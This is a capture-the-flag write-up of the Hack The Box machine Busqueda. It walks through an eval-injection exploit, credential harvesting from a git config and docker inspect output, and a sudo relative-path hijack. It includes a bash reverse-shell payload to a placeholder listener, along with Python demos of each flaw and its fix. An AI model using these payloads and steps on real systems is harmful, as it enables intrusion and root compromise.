Box: Busqueda
Level: Easy
OS: Linux
Let's get started.
Recon
PortScanning
command:sudo nmap -A 10.129.78.185 -v -p- -T4
Nmap scan report for searcher.htb (10.129.78.185)
Host is up (0.34s latency).
Not shown: 65369 closed tcp ports (reset), 164 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.1.2 Python/3.10.6
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-title: Searcher
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=10/30%OT=22%CT=1%CU=43868%PV=Y%DS=2%DC=T%G=Y%TM=653FBF
OS:10%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z
OS:%CI=Z%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11N
OS:W7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CS
OS:T11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=4
OS:0%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 11.571 days (since Thu Oct 19 01:53:13 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 446.93 ms 10.10.14.1
2 447.06 ms searcher.htb (10.129.78.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 30 15:34:56 2023 -- 1 IP address (1 host up) scanned in 1764.04 seconds
From our nmap scan we have two open ports: 22 running OpenSSH 8.9p1 and 80 running Apache 2.4.52, which is fronting a Werkzeug/2.1.2 Python/3.10.6 application (a Flask-style app). The scan report also shows the hostname searcher.htb for the box. Our enumeration today will be focused on port 80.
Enumeration
Navigate to the webpage. The site is served under the hostname searcher.htb, so we add that name to our /etc/hosts file (10.129.78.185 searcher.htb).
Now let's navigate back to the webpage.
Scrolling down to the footer shows the version of Searchor this site is built on. Googling that version turns up a public exploit for it.
Let's exploit this.
Exploitation
We will be using this GitHub exploit. Download it to your machine and make it executable:
command:chmod +x exploit.sh
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/busqueda]
└─$ chmod +x exploit.sh
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/busqueda]
└─$ ls -l exploit.sh
-rwxr-xr-x 1 bl4ck4non bl4ck4non 866 Oct 30 15:33 exploit.sh
To run the exploit script:
command:./exploit.sh searcher.htb LHOST LPORT
Replace LHOST and LPORT with your VPN address and listener port, and make sure your netcat listener is running on LPORT before executing this command.
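What the exploit script abuses is, by my reading of the Searchor bug, user input that gets interpolated into a Python expression and passed to eval(). The block below is an added, constructed illustration of that bug class and its fix; it is not Searchor's code and not the exploit script used above. The engine table, build_url(), and the canary() function that stands in for attacker code are assumptions made for the demo.

```python
"""Added, constructed illustration of the bug class the exploit targets:
user-controlled text interpolated into Python source and passed to eval()."""
import urllib.parse

# Constructed engine table (the real project supports many more engines).
ENGINES = {
    "google": "https://www.google.com/search?q={}",
    "bing": "https://www.bing.com/search?q={}",
}

# Records every call made by injected code, so the demo can prove it ran.
CANARY_HITS = []


def canary(tag):
    """Stands in for attacker code (a reverse shell on the box); here it only
    records that it executed and returns the tag."""
    CANARY_HITS.append(tag)
    return tag


def build_url(engine, query):
    """Builds the search URL, treating the query purely as data."""
    return ENGINES[engine].format(urllib.parse.quote_plus(query))


def search_vulnerable(engine, query):
    """Vulnerable pattern: engine and query are pasted into a source string
    and evaluated. A single quote in the query terminates the string literal,
    and everything after it is executed as Python with the app's privileges."""
    return eval(f"build_url('{engine}', '{query}')")


def search_hardened(engine, query):
    """Fix: no eval at all. The engine is validated against a fixed table and
    the query never leaves the data plane."""
    if engine not in ENGINES:
        raise ValueError(f"unknown engine: {engine!r}")
    return build_url(engine, query)


# Constructed payload: closes the literal, calls canary(), reopens the literal,
# so the evaluated source becomes build_url('google', '' + canary('injected') + '').
PAYLOAD = "' + canary('injected') + '"

if __name__ == "__main__":
    print(search_vulnerable("google", PAYLOAD))  # canary() runs during eval()
    print(CANARY_HITS)                           # ['injected']
    print(search_hardened("google", PAYLOAD))    # payload is just URL-encoded text
```

On the box the injected expression is a reverse-shell one-liner instead of canary(); the mechanism is the same, which is why a simple quote in the query is all the exploit script needs to get code running as the web user.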
Nice, we spawned a reverse shell. To stabilize this shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl + z (to background)
stty raw -echo && fg
export TERM=xterm
Let's go ahead and escalate our privileges.
Privilege Escalation
The directory /var/www/app contains a .git folder. Inside it, .git/config holds the remote URL of the repository, and that URL looks odd: it embeds cody:jh1usoih2bkjaspwe92@gitea.searcher.htb, which is a username and password stored in the remote URL (nothing else of interest was in there). Anyone who can read .git/config, including the account the web app runs as, gets these credentials.
Let's run sudo -l, which prompts for svc's password, and try jh1usoih2bkjaspwe92.
Nice, it worked: the password is reused for the svc user, and sudo -l shows we may run the script /opt/scripts/system-checkup.py with sudo.
Checking out the content of the script: we can't read it, we don't have permission for that. What we can do is execute it through sudo. Running it with no arguments shows that an action argument is required, and trying full-checkup at this point just gives an error, so let's test the other arguments:
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
The docker-inspect argument stands out. It wraps docker inspect, whose --format flag selects a subsection of the container's JSON; an empty format string makes docker print the full JSON document. So docker-inspect needs a format string and a container_id. To get the container ids we use the docker-ps argument:
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
We'll use each of those container ids in turn, with an empty format string so the whole JSON comes back:
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' 960873171e2e
Cool, the Config.Env section of this container holds the credentials for the gitea database. Let's dump the other container too:
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' f84a6b33fb5a
Nice, we got credentials from this container as well.
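Both credential finds so far came from secrets embedded in configuration: the password in the git remote URL in .git/config and the environment variables in docker inspect output. The Python below is an added example (not code from the box or this writeup) that pulls both out and flags values that appear in more than one place, which is exactly the reuse that pays off on this machine. The .git/config text, the inspect JSON, the container names and every secret value in it are constructed placeholders, not the real ones from the box.

```python
"""Added example: hunt for embedded credentials in a .git/config remote URL
and in `docker inspect` Config.Env, then flag values reused across both.
All sample inputs below are constructed placeholders."""
import configparser
import json
import re
from urllib.parse import urlsplit

# Constructed .git/config: same shape as the one found on the box, fake secret.
GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tbare = false
[remote "origin"]
\turl = http://cody:example-git-pass@gitea.searcher.htb/cody/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""

# Constructed `docker inspect` output: names, ids and values are made up.
DOCKER_INSPECT = json.dumps([
    {"Id": "960873171e2e" + "0" * 52, "Name": "/gitea",
     "Config": {"Env": ["GITEA__database__PASSWD=example-db-pass",
                        "USER_UID=1000", "PATH=/usr/local/bin:/usr/bin"]}},
    {"Id": "f84a6b33fb5a" + "0" * 52, "Name": "/mysql_db",
     "Config": {"Env": ["MYSQL_ROOT_PASSWORD=example-root-pass",
                        "MYSQL_USER=gitea", "MYSQL_PASSWORD=example-db-pass"]}},
])

# Env keys worth pulling; deliberately broad, review the hits by hand.
SECRET_KEY_RE = re.compile(r"PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY", re.I)


def git_remote_credentials(config_text):
    """Returns (host, username, password) for every remote whose URL embeds userinfo."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    # git indents keys with a tab; strip it so configparser's
    # continuation-line rule cannot misfire on any layout.
    parser.read_string("\n".join(line.strip() for line in config_text.splitlines()))
    found = []
    for section in parser.sections():
        if not section.startswith("remote "):
            continue
        parts = urlsplit(parser.get(section, "url", fallback=""))
        if parts.username and parts.password:
            found.append((parts.hostname, parts.username, parts.password))
    return found


def docker_env_secrets(inspect_json):
    """Returns (container, key, value) for secret-looking Config.Env entries."""
    hits = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        for entry in container.get("Config", {}).get("Env", []):
            key, sep, value = entry.partition("=")
            if sep and SECRET_KEY_RE.search(key):
                hits.append((name, key, value))
    return hits


def reused_secrets(*hit_lists):
    """Maps each secret value that shows up in more than one place to those places."""
    where = {}
    for hits in hit_lists:
        for *location, secret in hits:
            where.setdefault(secret, []).append(tuple(location))
    return {s: locs for s, locs in where.items() if len(locs) > 1}


if __name__ == "__main__":
    git_hits = git_remote_credentials(GIT_CONFIG)
    env_hits = docker_env_secrets(DOCKER_INSPECT)
    for hit in git_hits + env_hits:
        print(hit)
    print("reused:", reused_secrets(git_hits, env_hits))
```

Anything reused_secrets() reports is the first thing to spray against every login you have found (SSH, sudo, Gitea); on this box the same habit of reuse is what turns a database password into an application admin login.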
We can log in to Gitea as the administrator user with one of the passwords found in the containers (it is reused for the web login). First add the subdomain gitea.searcher.htb to our /etc/hosts file, on the same line as searcher.htb.
Navigating to the subdomain and logging in with
username:administrator
password:yuiu1hoiu4i5ho1uh
Nice, we are in.
Let's check the scripts repository, which contains system-checkup.py. Reading the script shows that the full-checkup action executes a file full-checkup.sh by relative path, that is, whatever full-checkup.sh exists in the directory the script is run from, and under sudo that runs as root.
We can exploit this by creating our own malicious full-checkup.sh that gives us a reverse shell back to our machine:
payload
#!/bin/bash
bash -i >& /dev/tcp/LHOST/LPORT 0>&1
Save this as full-checkup.sh, give it execute permission with chmod +x full-checkup.sh, and edit LHOST and LPORT to your listener's address and port.
Now run the full-checkup action again, this time from the directory that holds your full-checkup.sh and with a netcat listener waiting for the incoming connection:
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
We spawned a shell as the root user😎
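Why this worked, as an added example that is not the box's script: system-checkup.py invokes full-checkup.sh by relative path, so the file is resolved in the working directory of whoever runs the sudo command. The constructed script below reproduces that pattern, plants a full-checkup.sh in a temporary directory, and shows a hardened variant refusing both a relative path and a file that is not root-owned and protected. HOOK, plant_hook(), UnsafeHook and demo() are names made up for the demo.

```python
"""Added example: a privileged script that runs a helper by relative path
executes whatever file of that name sits in the caller's working directory.
Constructed illustration of the flaw and a hardened replacement."""
import os
import stat
import subprocess
import tempfile

HOOK = "full-checkup.sh"


class UnsafeHook(Exception):
    """Raised by the hardened runner when the hook fails a safety check."""


def run_checkup_vulnerable(cwd):
    """Flawed pattern: './full-checkup.sh' is resolved against the directory the
    (sudo) caller happens to be in, so an attacker-created file there runs with
    the script's privileges. Returns the hook's stdout."""
    proc = subprocess.run(["./" + HOOK], cwd=cwd, capture_output=True, text=True)
    return proc.stdout.strip()


def run_checkup_hardened(hook_path):
    """Hardened: absolute path only; must be a regular file (no symlinks),
    owned by root, and not writable by group or others. Checked before exec."""
    if not os.path.isabs(hook_path):
        raise UnsafeHook("hook path must be absolute")
    st = os.lstat(hook_path)
    if not stat.S_ISREG(st.st_mode):
        raise UnsafeHook("hook must be a regular file")
    if st.st_uid != 0:
        raise UnsafeHook("hook must be owned by root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafeHook("hook must not be group/world writable")
    proc = subprocess.run([hook_path], capture_output=True, text=True)
    return proc.stdout.strip()


def plant_hook(directory, message="hijacked"):
    """Attacker side: drop an executable full-checkup.sh into a directory we
    control. Stands in for the reverse-shell payload used on the box."""
    path = os.path.join(directory, HOOK)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho " + message + "\n")
    os.chmod(path, 0o777)  # deliberately sloppy: world-writable
    return path


def demo():
    """Runs the hijack against the vulnerable runner and shows the hardened one
    refusing the same file. Returns the observations for inspection."""
    with tempfile.TemporaryDirectory() as workdir:
        planted = plant_hook(workdir)
        hijacked = run_checkup_vulnerable(workdir)
        try:
            run_checkup_hardened("./" + HOOK)
            relative_refused = False
        except UnsafeHook:
            relative_refused = True
        try:
            run_checkup_hardened(planted)
            planted_refused = False
        except UnsafeHook:
            planted_refused = True
    return {
        "vulnerable_output": hijacked,
        "relative_refused": relative_refused,
        "planted_refused": planted_refused,
    }


if __name__ == "__main__":
    print(demo())
```

The ownership and permission checks matter as much as the absolute path: a root-run script that executes a helper any local user can edit is the same privilege escalation with one extra step.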
That will be all for today